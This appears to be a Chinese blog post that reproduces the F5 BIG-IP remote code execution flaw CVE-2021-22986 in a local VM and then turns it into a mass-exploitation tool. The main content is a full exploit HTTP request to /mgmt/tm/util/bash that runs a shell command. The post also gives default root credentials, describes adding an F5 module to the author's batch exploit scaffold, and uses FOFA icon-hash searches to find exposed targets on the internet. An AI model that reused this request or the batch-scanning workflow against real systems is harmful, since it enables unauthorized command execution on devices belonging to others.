脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用

简介: 脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用

伊始


前几天看了眼F5-RCE的poc,复制粘贴了一下。


01d6a8e2d0a2e701fb1dce9bdf8d15cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

荣获脚本小子称号。。。

748bc47d8e7f86849a6e85c2821d24d8_640_wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1.jpg


漏洞复现


注册账号:

https://login.f5.com/resource/registerEmail.do

邮箱激活之后,来下载。


c10394aaf0930985c7dd1dba66d46f00_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

858f6181428adb073bb447fb985471cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

530a40278920eee7a518d7ee2aaf0f62_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


因为下载的是ova格式的,我的电脑是mac,所以用了VMware Fusion Pro来运行它


0c5ad4d4dbdda836bf98a72613c0ac08_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


导入完成后,输入

用户名:root

密码:default

成功登陆后,输入config


ff03cd3b87dcbf456bfc149ddd7d1153_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


确定服务ip


e642e098a6148e3d6be30bf5889e0552_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


直接登陆后可以命令执行。


8d2e7b834d405ee53f41555bde647983_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


不过跟公开的poc不太一样,因为他的认证方式是cookie,同时我们需要知道后台账号密码才可以rce。


X-F5-Auth-Token:

Authorization: Basic YWRtaW46QVNhc1M=


又去看了之前发布的公告,漏洞影响的版本范围。

于是我去下载了16.0.0


1d23d1e1d71298e0a85326d3bce6c895_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


poc直接打本地,成功


POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.0.105

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:86.0) Gecko/20100101 Firefox/86.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

X-F5-Auth-Token:

Authorization: Basic YWRtaW46QVNhc1M=

Content-Length: 47

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Referer: https://192.168.0.103/tmui/login.jsp

Upgrade-Insecure-Requests: 1


{

"command":"run",

"utilCmdArgs":"-c id"

}


0678fb45f55db68c16210c7afefa279b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


批量利用工具编写


这个时候我们必须Diy下漏洞批量工具。

前往https://github.com/tangxiaofeng7/TSLab-Exploit

下载我之前写过的脚手架。

idea打开它



打开Tools类



增加一个if语句


19d680291c56c5b6a0053acc695f2fa8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


接着到exploit包下新建一个类-f5_rce 名字要跟刚刚new的函数对应


089de412d0d19ca432a35bd2a0e98594_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


一顿操作完之后。。。


fofa搜素资产


使用fofa搜索

icon_hash="xxxxxx"《清水师傅提供的》


7b50964c811a5090ecbc84a5483f4a6d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


85c5e0f37801514eaba222b16198f9eb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


相关文章
|
7月前
|
缓存 关系型数据库 BI
使用MYSQL Report分析数据库性能(下)
使用MYSQL Report分析数据库性能
484 158
|
9月前
|
机器学习/深度学习 人工智能 安全
企业内外网文件导入导出审计系统
Next FileFlow 是一款企业级轻量文件传输与安全管理平台,支持内外网隔离环境下的文件交互与安全审计。系统具备全流程审批、大文件传输、智能内容审计、统一权限管理等功能,满足金融、涉密机构、制造业等多行业需求,保障文件流转安全性与合规性。
|
9月前
|
SQL 监控 安全
数据库安全审计系统
Next-DBM数据库审计系统助力企业解决数据安全难题,提供统一身份管理、全方位监控、智能风险识别、完整审计追溯及精细化权限管控,有效防范数据泄露与内部威胁,保障企业核心资产安全,满足合规要求,提升运维效率。
|
弹性计算 安全 网络安全
阿里云服务器租用流程,四种阿里云服务器租用方式图文教程参考
阿里云服务器可以通过自定义租用、一键租用、云市场租用和活动租用四种方式去租用,不同的租用方式适合不同的用户群体,例如我们只是想租用一款配置较低且可以快速部署应用的云服务器,通常可以选择一键租用或者云市场租用,本文为大家展示不同租用方式的适合对象以及租用流程,以供初次租用阿里云服务器的用户参考和选择。下面是阿里云服务器租用的图文操作步骤。
13062 2
|
运维 Kubernetes 监控
在K8S中,Kubernetes常见的部署方式有哪些?
在K8S中,Kubernetes常见的部署方式有哪些?
|
存储 域名解析 前端开发
云上攻防-云服务篇&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
云上攻防-云服务篇&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
1898 8
|
数据库
最简单的WAF绕过方式
最简单的WAF绕过方式
1421 0
|
NoSQL JavaScript 安全
免费使用mongodb数据库
mongodb的云数据库,新用户注册,提供500m免费的空间,对于创建测试的网站数据库来说,足够使用。虽然是服务器是在美国,但是链接稳定。下面就介绍注册和使用的流程。
2172 0
免费使用mongodb数据库
|
算法 调度 C语言
操作系统进程调度算法(c语言模拟实现)
操作系统进程调度算法(c语言模拟实现)
917 0